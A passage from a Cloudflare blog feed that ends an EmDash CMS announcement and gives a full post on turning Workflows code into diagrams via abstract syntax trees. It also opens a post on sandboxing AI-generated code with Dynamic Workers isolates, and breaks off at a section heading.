    <p>The least fun part about working with any CMS is doing the rote migration of content: finding and replacing strings, migrating custom fields from one format to another, renaming, reordering and moving things around. This is either boring repetitive work or requires one-off scripts and  “single-use” plugins and tools that are usually neither fun to write nor to use.</p><p>EmDash is designed to be managed programmatically by your AI agents. It provides the context and the tools that your agents need, including:</p><ol><li><p><b>Agent Skills:</b> Each EmDash instance includes <a href="https://agentskills.io/home"><u>Agent Skills</u></a> that describe to your agent the capabilities EmDash can provide to plugins, the hooks that can trigger plugins, <a href="https://github.com/emdash-cms/emdash/blob/main/skills/creating-plugins/SKILL.md"><u>guidance on how to structure a plugin</u></a>, and even <a href="https://github.com/emdash-cms/emdash/blob/main/skills/wordpress-theme-to-emdash/SKILL.md"><u>how to port legacy WordPress themes to EmDash natively</u></a>. When you give an agent an EmDash codebase, EmDash provides everything the agent needs to be able to customize your site in the way you need.</p></li><li><p><b>EmDash CLI:</b> The <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx"><u>EmDash CLI</u></a> enables your agent to interact programmatically with your local or remote instance of EmDash. You can <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#media-upload-file"><u>upload media</u></a>, <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#emdash-search"><u>search for content</u></a>, <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#schema-create-collection"><u>create and manage schemas</u></a>, and do the same set of things you can do in the Admin UI.</p></li><li><p><b>Built-in MCP Server:</b> Every EmDash instance provides its own remote Model Context Protocol (MCP) server, allowing you to do the same set of things you can do in the Admin UI.</p></li></ol>
    <div>
      <h3>Pluggable authentication, with Passkeys by default</h3>
      <a href="#pluggable-authentication-with-passkeys-by-default">
        
      </a>
    </div>
    <p>EmDash uses passkey-based authentication by default, meaning there are no passwords to leak and no brute-force vectors to defend against. User management includes familiar role-based access control out of the box: administrators, editors, authors, and contributors, each scoped strictly to the actions they need. Authentication is pluggable, so you can set EmDash up to work with your SSO provider, and automatically provision access based on IdP metadata.</p>
    <div>
      <h3>Import your WordPress sites to EmDash</h3>
      <a href="#import-your-wordpress-sites-to-emdash">
        
      </a>
    </div>
    <p>You can import an existing WordPress site by either going to WordPress admin and exporting a WXR file, or by installing the <a href="https://github.com/emdash-cms/wp-emdash/tree/main/plugins/emdash-exporter"><u>EmDash Exporter plugin</u></a> on a WordPress site, which configures a secure endpoint that is only exposed to you, and protected by a WordPress Application Password you control. Migrating content takes just a few minutes, and automatically works to bring any attached media into EmDash’s media library.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/SUFaWUIoEFSN2z9rclKZW/28870489d502cff34e35ab3b59f19eae/image1.png" />
          </figure><p>Creating any custom content types on WordPress that are not a Post or a Page has meant installing heavy plugins like Advanced Custom Fields, and squeezing the result into a crowded WordPress posts table. EmDash does things differently: you can define a schema directly in the admin panel, which will create entirely new EmDash collections for you, separately ordered in the database. On import, you can use the same capabilities to take any custom post types from WordPress, and create an EmDash content type from it. </p><p>For bespoke blocks, you can use the <a href="https://github.com/emdash-cms/emdash/blob/main/skills/creating-plugins/references/block-kit.md"><u>EmDash Block Kit Agent Skill</u></a> to instruct your agent of choice and build them for EmDash.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xutdF9nvHYMYlN6XfqRGu/1db0e0d73327e926d606f92fdd7aabec/image3.png" />
          </figure>
    <div>
      <h3>Try it</h3>
      <a href="#try-it">
        
      </a>
    </div>
    <p>EmDash is v0.1.0 preview, and we’d love you to try it, give feedback, and we welcome contributions to the <a href="https://github.com/emdash-cms/emdash/"><u>EmDash GitHub repository</u></a>.</p><p>If you’re just playing around and want to first understand what’s possible — try out the admin interface in the <a href="https://emdashcms.com/"><u>EmDash Playground</u></a>.</p><p>To create a new EmDash site locally, via the CLI, run:</p><p><code>npm create emdash@latest</code></p><p>Or you can do the same via the Cloudflare dashboard below:</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/emdash-cms/templates/tree/main/blog-cloudflare"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>We’re excited to see what you build, and if you're active in the WordPress community, as a hosting platform, a plugin or theme author, or otherwise — we’d love to hear from you. Email us at emdash@cloudflare.com, and tell us what you’d like to see from the EmDash project.</p><p>If you want to stay up to date with major EmDash developments, you can leave your email address <a href="https://forms.gle/ofE1LYRYxkpAPqjE7"><u>here</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Open Source]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">64rkKr9jewVmxagIFgbwY4</guid>
            <dc:creator>Matt “TK” Taylor</dc:creator>
            <dc:creator>Matt Kane</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we use Abstract Syntax Trees (ASTs) to turn Workflows code into visual diagrams ]]></title>
            <link>https://blog.cloudflare.com/workflow-diagrams/</link>
            <pubDate>Fri, 27 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Workflows are now visualized via step diagrams in the dashboard. Here’s how we translate your TypeScript code into a visual representation of the workflow.  ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Cloudflare Workflows</u></a> is a durable execution engine that lets you chain steps, retry on failure, and persist state across long-running processes. Developers use Workflows to power background agents, manage data pipelines, build human-in-the-loop approval systems, and more.</p><p>Last month, we <a href="https://developers.cloudflare.com/changelog/post/2026-02-03-workflows-visualizer/"><u>announced</u></a> that every workflow deployed to Cloudflare now has a complete visual diagram in the dashboard.</p><p>We built this because being able to visualize your applications is more important now than ever before. Coding agents are writing code that you may or may not be reading. However, the shape of what gets built still matters: how the steps connect, where they branch, and what's actually happening.</p><p>If you've seen diagrams from visual workflow builders before, those are usually working from something declarative: JSON configs, YAML, drag-and-drop. However, Cloudflare Workflows are just code. They can include <a href="https://developers.cloudflare.com/workflows/build/workers-api/"><u>Promises, Promise.all, loops, conditionals,</u></a> and/or be nested in functions or classes. This dynamic execution model makes rendering a diagram a bit more complicated.</p><p>We use Abstract Syntax Trees (ASTs) to statically derive the graph, tracking <code>Promise</code> and <code>await</code> relationships to understand what runs in parallel, what blocks, and how the pieces connect. </p><p>Keep reading to learn how we built these diagrams, or deploy your first workflow and see the diagram for yourself.</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/workflows-starter-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>Here’s an example of a diagram generated from Cloudflare Workflows code:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/44NnbqiNda2vgzIEneHQ3W/044856325693fbeb75ed1ab38b4db1c2/image1.png" />
          </figure>
    <div>
      <h3>Dynamic workflow execution</h3>
      <a href="#dynamic-workflow-execution">
        
      </a>
    </div>
    <p>Generally, workflow engines can execute according to either dynamic or sequential (static) execution order. Sequential execution might seem like the more intuitive solution: trigger workflow → step A → step B → step C, where step B starts executing immediately after the engine completes Step A, and so forth.</p><p><a href="https://developers.cloudflare.com/workflows/"><u>Cloudflare Workflows</u></a> follow the dynamic execution model. Since workflows are just code, the steps execute as the runtime encounters them. When the runtime discovers a step, that step gets passed over to the workflow engine, which manages its execution. The steps are not inherently sequential unless awaited — the engine executes all unawaited steps in parallel. This way, you can write your workflow code as flow control without additional wrappers or directives. Here’s how the handoff works:</p><ol><li><p>An <i>engine</i>, which is a “supervisor” Durable Object for that instance, spins up. The engine is responsible for the logic of the actual workflow execution. </p></li><li><p>The engine triggers a <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/how-workers-for-platforms-works/#user-workers"><u>user worker</u></a> via <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/configuration/dynamic-dispatch/"><u>dynamic dispatch</u></a>, passing control over to Workers runtime.</p></li><li><p>When Runtime encounters a <code>step.do</code>, it passes the execution back to the engine.</p></li><li><p>The engine executes the step, persists the result (or throws an error, if applicable) and triggers the user Worker again.  </p></li></ol><p>With this architecture, the engine does not inherently “know” the order of the steps that it is executing — but for a diagram, the order of steps becomes crucial information. The challenge here lies in getting the vast majority of workflows translated accurately into a diagnostically helpful graph; with the diagrams in beta, we will continue to iterate and improve on these representations.</p>
    <div>
      <h3>Parsing the code</h3>
      <a href="#parsing-the-code">
        
      </a>
    </div>
    <p>Fetching the script at <a href="https://developers.cloudflare.com/workers/get-started/guide/#4-deploy-your-project"><u>deploy time</u></a>, instead of run time, allows us to parse the workflow in its entirety to statically generate the diagram. </p><p>Taking a step back, here is the life of a workflow deployment:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1zoOCYji26ahxzh594VavQ/63ad96ae033653ffc7fd98df01ea6e27/image5.png" />
          </figure><p>To create the diagram, we fetch the script after it has been bundled by the internal configuration service which deploys Workers (step 2 under Workflow deployment). Then, we use a parser to create an abstract syntax tree (AST) representing the workflow, and our internal service generates and traverses an intermediate graph with all WorkflowEntrypoints and calls to workflows steps. We render the diagram based on the final result on our API. </p><p>When a Worker is deployed, the configuration service bundles (using <a href="https://esbuild.github.io/"><u>esbuild</u></a> by default) and minifies the code <a href="https://developers.cloudflare.com/workers/wrangler/configuration/#inheritable-keys"><u>unless specified otherwise</u></a>. This presents another challenge — while Workflows in TypeScript follow an intuitive pattern, their minified Javascript (JS) can be dense and indigestible. There are also different ways that code can be minified, depending on the bundler. </p><p>Here’s an example of Workflow code that shows <b>agents executing in parallel:</b></p>
            <pre><code>const summaryPromise = step.do(
         `summary agent (loop ${loop})`,
         async () =&gt; {
           return runAgentPrompt(
             this.env,
             SUMMARY_SYSTEM,
             buildReviewPrompt(
               'Summarize this text in 5 bullet points.',
               draft,
               input.context
             )
           );
         }
       );
        const correctnessPromise = step.do(
         `correctness agent (loop ${loop})`,
         async () =&gt; {
           return runAgentPrompt(
             this.env,
             CORRECTNESS_SYSTEM,
             buildReviewPrompt(
               'List correctness issues and suggested fixes.',
               draft,
               input.context
             )
           );
         }
       );
        const clarityPromise = step.do(
         `clarity agent (loop ${loop})`,
         async () =&gt; {
           return runAgentPrompt(
             this.env,
             CLARITY_SYSTEM,
             buildReviewPrompt(
               'List clarity issues and suggested fixes.',
               draft,
               input.context
             )
           );
         }
       );</code></pre>
            <p>Bundling with <a href="https://rspack.rs/"><u>rspack</u></a>, a snippet of the minified code looks like this:</p>
            <pre><code>class pe extends e{async run(e,t){de("workflow.run.start",{instanceId:e.instanceId});const r=await t.do("validate payload",async()=&gt;{if(!e.payload.r2Key)throw new Error("r2Key is required");if(!e.payload.telegramChatId)throw new Error("telegramChatId is required");return{r2Key:e.payload.r2Key,telegramChatId:e.payload.telegramChatId,context:e.payload.context?.trim()}}),s=await t.do("load source document from r2",async()=&gt;{const e=await this.env.REVIEW_DOCUMENTS.get(r.r2Key);if(!e)throw new Error(`R2 object not found: ${r.r2Key}`);const t=(await e.text()).trim();if(!t)throw new Error("R2 object is empty");return t}),n=Number(this.env.MAX_REVIEW_LOOPS??"5"),o=this.env.RESPONSE_TIMEOUT??"7 days",a=async(s,i,c)=&gt;{if(s&gt;n)return le("workflow.loop.max_reached",{instanceId:e.instanceId,maxLoops:n}),await t.do("notify max loop reached",async()=&gt;{await se(this.env,r.telegramChatId,`Review stopped after ${n} loops for ${e.instanceId}. Start again if you still need revisions.`)}),{approved:!1,loops:n,finalText:i};const h=t.do(`summary agent (loop ${s})`,async()=&gt;te(this.env,"You summarize documents. Keep the output short, concrete, and factual.",ue("Summarize this text in 5 bullet points.",i,r.context)))...</code></pre>
            <p>Or, bundling with <a href="https://vite.dev/"><u>vite</u></a>, here is a minified snippet:</p>
            <pre><code>class ht extends pe {
  async run(e, r) {
    b("workflow.run.start", { instanceId: e.instanceId });
    const s = await r.do("validate payload", async () =&gt; {
      if (!e.payload.r2Key)
        throw new Error("r2Key is required");
      if (!e.payload.telegramChatId)
        throw new Error("telegramChatId is required");
      return {
        r2Key: e.payload.r2Key,
        telegramChatId: e.payload.telegramChatId,
        context: e.payload.context?.trim()
      };
    }), n = await r.do(
      "load source document from r2",
      async () =&gt; {
        const i = await this.env.REVIEW_DOCUMENTS.get(s.r2Key);
        if (!i)
          throw new Error(`R2 object not found: ${s.r2Key}`);
        const c = (await i.text()).trim();
        if (!c)
          throw new Error("R2 object is empty");
        return c;
      }
    ), o = Number(this.env.MAX_REVIEW_LOOPS ?? "5"), l = this.env.RESPONSE_TIMEOUT ?? "7 days", a = async (i, c, u) =&gt; {
      if (i &gt; o)
        return H("workflow.loop.max_reached", {
          instanceId: e.instanceId,
          maxLoops: o
        }), await r.do("notify max loop reached", async () =&gt; {
          await J(
            this.env,
            s.telegramChatId,
            `Review stopped after ${o} loops for ${e.instanceId}. Start again if you still need revisions.`
          );
        }), {
          approved: !1,
          loops: o,
          finalText: c
        };
      const h = r.do(
        `summary agent (loop ${i})`,
        async () =&gt; _(
          this.env,
          et,
          K(
            "Summarize this text in 5 bullet points.",
            c,
            s.context
          )
        )
      )...</code></pre>
            <p>Minified code can get pretty gnarly — and depending on the bundler, it can get gnarly in a bunch of different directions.</p><p>We needed a way to parse the various forms of minified code quickly and precisely. We decided <code>oxc-parser</code> from the <a href="https://oxc.rs/"><u>JavaScript Oxidation Compiler</u></a> (OXC) was perfect for the job. We first tested this idea by having a container running Rust. Every script ID was sent to a <a href="https://developers.cloudflare.com/queues/"><u>Cloudflare Queue</u></a>, after which messages were popped and sent to the container to process. Once we confirmed this approach worked, we moved to a Worker written in Rust. Workers supports running <a href="https://developers.cloudflare.com/workers/languages/rust/"><u>Rust via WebAssembly</u></a>, and the package was small enough to make this straightforward.</p><p>The Rust Worker is responsible for first converting the minified JS into AST node types, then converting the AST node types into the graphical version of the workflow that is rendered on the dashboard. To do this, we generate a graph of pre-defined <a href="https://developers.cloudflare.com/workflows/build/visualizer/"><u>node types</u></a> for each workflow and translate into our graph representation through a series of node mappings. </p>
    <div>
      <h3>Rendering the diagram</h3>
      <a href="#rendering-the-diagram">
        
      </a>
    </div>
    <p>There were two challenges to rendering a diagram version of the workflow: how to track step and function relationships correctly, and how to define the workflow node types as simply as possible while covering all the surface area.</p><p>To guarantee that step and function relationships are tracked correctly, we needed to collect both the function and step names. As we discussed earlier, the engine only has information about the steps, but a step may be dependent on a function, or vice versa. For example, developers might wrap steps in functions or define functions as steps. They could also call steps within a function that come from different <a href="https://blog.cloudflare.com/workers-javascript-modules/"><u>modules</u></a> or rename steps. </p><p>Although the library passes the initial hurdle by giving us the AST, we still have to decide how to parse it.  Some code patterns require additional creativity. For example, functions — within a <code>WorkflowEntrypoint</code>, there can be functions that call steps directly, indirectly, or not at all. Consider <code>functionA</code>, which contains <code>console.log(await functionB(), await functionC()</code>) where <code>functionB</code> calls a <code>step.do()</code>. In that case, both <code>functionA</code> and <code>functionB</code> should be included on the workflow diagram; however, <code>functionC</code> should not. To catch all functions which include direct and indirect step calls, we create a subgraph for each function and check whether it contains a step call itself or whether it calls another function which might. Those subgraphs are represented by a function node, which contains all of its relevant nodes. If a function node is a leaf of the graph, meaning it has no direct or indirect workflow steps within it, it is trimmed from the final output. </p><p>We check for other patterns as well, including a list of static steps from which we can infer the workflow diagram or variables, defined in up to ten different ways. If your script contains multiple workflows, we follow a similar pattern to the subgraphs created for functions, abstracted one level higher. </p><p>For every AST node type, we had to consider every way they could be used inside of a workflow: loops, branches, promises, parallels, awaits, arrow functions… the list goes on. Even within these paths, there are dozens of possibilities. Consider just a few of the possible ways to loop:</p>
            <pre><code>// for...of
for (const item of items) {
	await step.do(`process ${item}`, async () =&gt; item);
}
// while
while (shouldContinue) {
	await step.do('poll', async () =&gt; getStatus());
}
// map
await Promise.all(
	items.map((item) =&gt; step.do(`map ${item}`, async () =&gt; item)),
);
// forEach
await items.forEach(async (item) =&gt; {
	await step.do(`each ${item}`, async () =&gt; item);
});</code></pre>
            <p>And beyond looping, how to handle branching:</p>
            <pre><code>// switch / case
switch (action.type) {
	case 'create':
		await step.do('handle create', async () =&gt; {});
		break;
	default:
		await step.do('handle unknown', async () =&gt; {});
		break;
}

// if / else if / else
if (status === 'pending') {
	await step.do('pending path', async () =&gt; {});
} else if (status === 'active') {
	await step.do('active path', async () =&gt; {});
} else {
	await step.do('fallback path', async () =&gt; {});
}

// ternary operator
await (cond
	? step.do('ternary true branch', async () =&gt; {})
	: step.do('ternary false branch', async () =&gt; {}));

// nullish coalescing with step on RHS
const myStepResult =
	variableThatCanBeNullUndefined ??
	(await step.do('nullish fallback step', async () =&gt; 'default'));

// try/catch with finally
try {
	await step.do('try step', async () =&gt; {});
} catch (_e) {
	await step.do('catch step', async () =&gt; {});
} finally {
	await step.do('finally step', async () =&gt; {});
}</code></pre>
            <p>Our goal was to create a concise API that communicated what developers need to know without overcomplicating it. But converting a workflow into a diagram meant accounting for every pattern (whether it follows best practices, or not) and edge case possible. As we discussed earlier, each step is not explicitly sequential, by default, to any other step. If a workflow does not utilize <code>await</code> and <code>Promise.all()</code>, we assume that the steps will execute in the order in which they are encountered. But if a workflow included <code>await</code>, <code>Promise</code> or <code>Promise.all()</code>, we needed a way to track those relationships.</p><p>We decided on tracking execution order, where each node has a <code>starts:</code> and <code>resolves:</code> field. The <code>starts</code> and <code>resolves</code> indices tell us when a promise started executing and when it ends relative to the first promise that started without an immediate, subsequent conclusion. This correlates to vertical positioning in the diagram UI (i.e., all steps with <code>starts:1</code> will be inline). If steps are awaited when they are declared, then <code>starts</code> and <code>resolves</code> will be undefined, and the workflow will execute in the order of the steps’ appearance to the runtime.</p><p>While parsing, when we encounter an unawaited <code>Promise</code> or <code>Promise.all()</code>, that node (or nodes) are marked with an entry number, surfaced in the <code>starts</code> field. If we encounter an <code>await</code> on that promise, the entry number is incremented by one and saved as the exit number (which is the value in <code>resolves</code>). This allows us to know which promises run at the same time and when they’ll complete in relation to each other.</p>
            <pre><code>export class ImplicitParallelWorkflow extends WorkflowEntrypoint&lt;Env, Params&gt; {
 async run(event: WorkflowEvent&lt;Params&gt;, step: WorkflowStep) {
   const branchA = async () =&gt; {
     const a = step.do("task a", async () =&gt; "a"); //starts 1
     const b = step.do("task b", async () =&gt; "b"); //starts 1
     const c = await step.waitForEvent("task c", { type: "my-event", timeout: "1 hour" }); //starts 1 resolves 2
     await step.do("task d", async () =&gt; JSON.stringify(c)); //starts 2 resolves 3
     return Promise.all([a, b]); //resolves 3
   };

   const branchB = async () =&gt; {
     const e = step.do("task e", async () =&gt; "e"); //starts 1
     const f = step.do("task f", async () =&gt; "f"); //starts 1
     return Promise.all([e, f]); //resolves 2
   };

   await Promise.all([branchA(), branchB()]);

   await step.sleep("final sleep", 1000);
 }
}</code></pre>
            <p>You can see the steps’ alignment in the diagram:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EZJ38J3H55yH0OnT11vgg/6dde06725cd842725ee3af134b1505c0/image3.png" />
          </figure><p>After accounting for all of those patterns, we settled on the following list of node types: 	</p>
            <pre><code>| StepSleep
| StepDo
| StepWaitForEvent
| StepSleepUntil
| LoopNode
| ParallelNode
| TryNode
| BlockNode
| IfNode
| SwitchNode
| StartNode
| FunctionCall
| FunctionDef
| BreakNode;</code></pre>
            <p>Here are a few samples of API output for different behaviors: </p><p><code>function</code> call:</p>
            <pre><code>{
  "functions": {
    "runLoop": {
      "name": "runLoop",
      "nodes": []
    }
  }
}</code></pre>
            <p><code>if</code> condition branching to <code>step.do</code>:</p>
            <pre><code>{
  "type": "if",
  "branches": [
    {
      "condition": "loop &gt; maxLoops",
      "nodes": [
        {
          "type": "step_do",
          "name": "notify max loop reached",
          "config": {
            "retries": {
              "limit": 5,
              "delay": 1000,
              "backoff": "exponential"
            },
            "timeout": 10000
          },
          "nodes": []
        }
      ]
    }
  ]
}</code></pre>
            <p><code>parallel</code> with <code>step.do</code> and <code>waitForEvent</code>:</p>
            <pre><code>{
  "type": "parallel",
  "kind": "all",
  "nodes": [
    {
      "type": "step_do",
      "name": "correctness agent (loop ${...})",
      "config": {
        "retries": {
          "limit": 5,
          "delay": 1000,
          "backoff": "exponential"
        },
        "timeout": 10000
      },
      "nodes": [],
      "starts": 1
    },
...
    {
      "type": "step_wait_for_event",
      "name": "wait for user response (loop ${...})",
      "options": {
        "event_type": "user-response",
        "timeout": "unknown"
      },
      "starts": 3,
      "resolves": 4
    }
  ]
}</code></pre>
            
    <div>
      <h3>What’s next</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Ultimately, the goal of these Workflow diagrams is to serve as a full-service debugging tool. That means you’ll be able to:</p><ul><li><p>Trace an execution through the graph in real time</p></li><li><p>Discover errors, wait for human-in-the-loop approvals, and skip steps for testing</p></li><li><p>Access visualizations in local development</p></li></ul><p>Check out the diagrams on your <a href="https://dash.cloudflare.com/?to=/:account/workers/workflows"><u>Workflow overview pages</u></a>. If you have any feature requests or notice any bugs, share your feedback directly with the Cloudflare team by joining the <a href="https://discord.cloudflare.com/"><u>Cloudflare Developers community on Discord</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Workflows]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">4HOWpzOgT3eVU2wFa4adFU</guid>
            <dc:creator>André Venceslau</dc:creator>
            <dc:creator>Mia Malden</dc:creator>
        </item>
        <item>
            <title><![CDATA[Sandboxing AI agents, 100x faster]]></title>
            <link>https://blog.cloudflare.com/dynamic-workers/</link>
            <pubDate>Tue, 24 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ We’re introducing Dynamic Workers, which allow you to execute AI-generated code in secure, lightweight isolates. This approach is 100 times faster than traditional containers, enabling millisecond startup times for AI agent sandboxing. ]]></description>
            <content:encoded><![CDATA[ <p>Last September we introduced <a href="https://blog.cloudflare.com/code-mode/"><u>Code Mode</u></a>, the idea that agents should perform tasks not by making tool calls, but instead by writing code that calls APIs. We've shown that simply converting an MCP server into a TypeScript API can <a href="https://www.youtube.com/watch?v=L2j3tYTtJwk"><u>cut token usage by 81%</u></a>. We demonstrated that Code Mode can also operate <i>behind</i> an MCP server instead of in front of it, creating the new <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>Cloudflare MCP server that exposes the entire Cloudflare API with just two tools and under 1,000 tokens</u></a>.</p><p>But if an agent (or an MCP server) is going to execute code generated on-the-fly by AI to perform tasks, that code needs to run somewhere, and that somewhere needs to be secure. You can't just <code>eval() </code>AI-generated code directly in your app: a malicious user could trivially prompt the AI to inject vulnerabilities.</p><p>You need a <b>sandbox</b>: a place to execute code that is isolated from your application and from the rest of the world, except for the specific capabilities the code is meant to access.</p><p>Sandboxing is a hot topic in the AI industry. For this task, most people are reaching for containers. Using a Linux-based container, you can start up any sort of code execution environment you want. Cloudflare even offers <a href="https://developers.cloudflare.com/containers/"><u>our container runtime</u></a> and <a href="https://developers.cloudflare.com/sandbox/"><u>our Sandbox SDK</u></a> for this purpose.</p><p>But containers are expensive and slow to start, taking hundreds of milliseconds to boot and hundreds of megabytes of memory to run. You probably need to keep them warm to avoid delays, and you may be tempted to reuse existing containers for multiple tasks, compromising the security.</p><p><b>If we want to support consumer-scale agents, where every end user has an agent (or many!) and every agent writes code, containers are not enough. We need something lighter.</b></p><h6>And we have it.</h6>
    <div>
      <h2>Dynamic Worker Loader: a lean sandbox</h2>
      <a href="#dynamic-worker-loader-a-lean-sandbox">
        
      </a>
    </div>
    <p>Tucked into our Code Mode post in September was the announcement of a new, experimental feature: the Dynamic Worker Loader API. This API allows a Cloudflare Worker to instantiate a new Worker, in its own sandbox, with code specified at runtime, all on the fly.</p><p><b>Dynamic Worker Loader is now in open beta, available to all paid Workers users.</b></p><p><a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Read the docs for full details</u></a>, but here's what it looks like:</p>
            <pre><code>// Have your LLM generate code like this.
let agentCode: string = `
  export default {
    async myAgent(param, env, ctx) {
      // ...
    }
  }
`;

// Get RPC stubs representing APIs the agent should be able
// to access. (This can be any Workers RPC API you define.)
let chatRoomRpcStub = ...;

// Load a worker to run the code, using the worker loader
// binding.
let worker = env.LOADER.load({
  // Specify the code.
  compatibilityDate: "2026-03-01",
  mainModule: "agent.js",
  modules: { "agent.js": agentCode },

  // Give agent access to the chat room API.
  env: { CHAT_ROOM: chatRoomRpcStub },

  // Block internet access. (You can also intercept it.)
  globalOutbound: null,
});

// Call RPC methods exported by the agent code.
await worker.getEntrypoint().myAgent(param);
</code></pre>
            <p>That's it.</p>
    <div>
      <h3>100x faster</h3>
      <a href="#100x-faster">
        
      </a>
    </div>
    <p>Dynamic Workers use the same underlying sandboxing mechanism that the entire Cloudflare Workers platform has been built on since its launch, eight years ago: isolates. An isolate is an instance of the V8 JavaScript execution engine, the same engine used by Google Chrome. They are <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>how Workers work</u></a>.</p><p>An isolate takes a few milliseconds to start and uses a few megabytes of memory. That's around 100x faster and 10x-100x more memory efficient than a typical container.</p><p><b>That means that if you want to start a new isolate for every user request, on-demand, to run one snippet of code, then throw it away, you can.</b></p>
    <div>
      <h3>Unlimited scalability</h3>
      <a href="#unlimited-scalability">
        
      </a>
    </div>
    <p>Many container-based sandbox providers impose limits on global concurrent sandboxes and rate of sandbox creation. Dynamic Worker Loader has no such limits. It doesn't need to, because it is simply an API to the same technology that has powered our platform all along, which has always allowed Workers to seamlessly scale to millions of requests per second.</p><p>Want to handle a million requests per second, where <i>every single request</i> loads a separate Dynamic Worker sandbox, all running concurrently? No problem!</p>
    <div>
      <h3>Zero latency</h3>
      <a href="#zero-latency">
        
      </a>
    </div>
    <p>One-off Dynamic Workers usually run on the same machine — the same thread, even — as the Worker that created them. No need to communicate around the world to find a warm sandbox. Isolates are so lightweight that we can just run them wherever the request landed. Dynamic Workers are supported in every one of Cloudflare's hundreds of locations around the world.</p>
    <div>
      <h3>It's all JavaScript</h3>
      <a href="#its-all-javascript">
        
      </a>
    </div>
    <p>The only catch, vs. containers, is that your agent needs to write JavaScript.</p><p>Technically, Workers (including dynamic ones) can use Python and WebAssembly, but for small snippets of code — like that written on-demand by an agent — JavaScript will load and run much faster.</p><p>We humans tend to have strong preferences on programming languages, and while many love JavaScript, others might prefer Python, Rust, or countless others.</p><p>But we aren't talking about humans here. We're talking about AI. AI will write any language you want it to. LLMs are experts in every major language. Their training data in JavaScript is immense.</p><p>JavaScript, by its nature on the web, is designed to be sandboxed. It is the correct language for the job.</p>
    <div>
      <h3>Tools defined in TypeScript</h3>
      <a href="#tools-defined-in-typescript">
        
      </a>
    </div>
    <p>If we want our agent to be able to do anything useful, it needs to talk to external APIs. How do we tell it about the APIs it has access to?</p><p>MCP defines schemas for flat tool calls, but not programming APIs. OpenAPI offers a way to express REST APIs, but it is verbose, both in the schema itself and the code you'd have to write to call it.</p><p>For APIs exposed to JavaScript, there is a single, obvious answer: TypeScript.</p><p>Agents know TypeScript. TypeScript is designed to be concise. With very few tokens, you can give your agent a precise understanding of your API.</p>
            <pre><code>// Interface to interact with a chat room.
interface ChatRoom {
  // Get the last `limit` messages of the chat log.
  getHistory(limit: number): Promise&lt;Message[]&gt;;

  // Subscribe to new messages. Dispose the returned object
  // to unsubscribe.
  subscribe(callback: (msg: Message) =&gt; void): Promise&lt;Disposable&gt;;

  // Post a message to chat.
  post(text: string): Promise&lt;void&gt;;
}

type Message = {
  author: string;
  time: Date;
  text: string;
}
</code></pre>
            <p>Compare this with the equivalent OpenAPI spec (which is so long you have to scroll to see it all):</p><pre>
openapi: 3.1.0
info:
  title: ChatRoom API
  description: &gt;
    Interface to interact with a chat room.
  version: 1.0.0

paths:
  /messages:
    get:
      operationId: getHistory
      summary: Get recent chat history
      description: Returns the last `limit` messages from the chat log, newest first.
      parameters:
        - name: limit
          in: query
          required: true
          schema:
            type: integer
            minimum: 1
      responses:
        "200":
          description: A list of messages.
          content:
            application/json:
              schema:
                type: array
                items:
                  $ref: "#/components/schemas/Message"

    post:
      operationId: postMessage
      summary: Post a message to the chat room
      requestBody:
        required: true
        content:
          application/json:
            schema:
              type: object
              required:
                - text
              properties:
                text:
                  type: string
      responses:
        "204":
          description: Message posted successfully.

  /messages/stream:
    get:
      operationId: subscribeMessages
      summary: Subscribe to new messages via SSE
      description: &gt;
        Opens a Server-Sent Events stream. Each event carries a JSON-encoded
        Message object. The client unsubscribes by closing the connection.
      responses:
        "200":
          description: An SSE stream of new messages.
          content:
            text/event-stream:
              schema:
                description: &gt;
                  Each SSE `data` field contains a JSON-encoded Message object.
                $ref: "#/components/schemas/Message"

components:
  schemas:
    Message:
      type: object
      required:
        - author
        - time
        - text
      properties:
        author:
          type: string
        time:
          type: string
          format: date-time
        text:
          type: string
</pre><p>We think the TypeScript API is better. It's fewer tokens and much easier to understand (for both agents and humans).  </p><p>Dynamic Worker Loader makes it easy to implement a TypeScript API like this in your own Worker and then pass it in to the Dynamic Worker either as a method parameter or in the env object. The Workers Runtime will automatically set up a <a href="https://blog.cloudflare.com/capnweb-javascript-rpc-library/"><u>Cap'n Web RPC</u></a> bridge between the sandbox and your harness code, so that the agent can invoke your API across the security boundary without ever realizing that it isn't using a local library.</p><p>That means your agent can write code like this:</p>
            <pre><code>// Thinking: The user asked me to summarize recent chat messages from Alice.
// I will filter the recent message history in code so that I only have to
// read the relevant messages.
let history = await env.CHAT_ROOM.getHistory(1000);
return history.filter(msg =&gt; msg.author == "alice");
</code></pre>
            
    <div>
      <h3>HTTP filtering and credential injection</h3>
      <a href="#http-filtering-and-credential-injection">
